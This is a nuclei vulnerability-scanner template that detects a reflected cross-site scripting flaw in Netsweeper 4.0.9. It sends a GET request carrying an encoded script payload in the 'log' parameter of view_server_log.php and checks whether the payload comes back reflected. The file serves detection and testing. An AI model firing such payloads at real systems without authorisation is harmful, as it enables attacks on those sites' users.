nuclei-templates/http/vulnerabilities/netsweeper/netsweeper-rxss.yaml

41 lines
1.5 KiB
YAML

id: netsweeper-rxss
info:
name: Netsweeper 4.0.9 - Cross-Site Scripting
author: daffainfo
severity: high
description: Netsweeper 4.0.9 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://www.exploit-db.com/exploits/37930
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
max-request: 1
tags: edb,xss,packetstorm,netsweeper
http:
- method: GET
path:
- '{{BaseURL}}/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter='
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a004630440220386fcc5db664d93eb27958dafe1be9074fe7505c15db471d2ec80129cced155702201702f93a28e6c44811955950db41b9ddea26f8d28908c2ffbce99bb7e9a03393:922c64590222798bb761d5b6d8e72950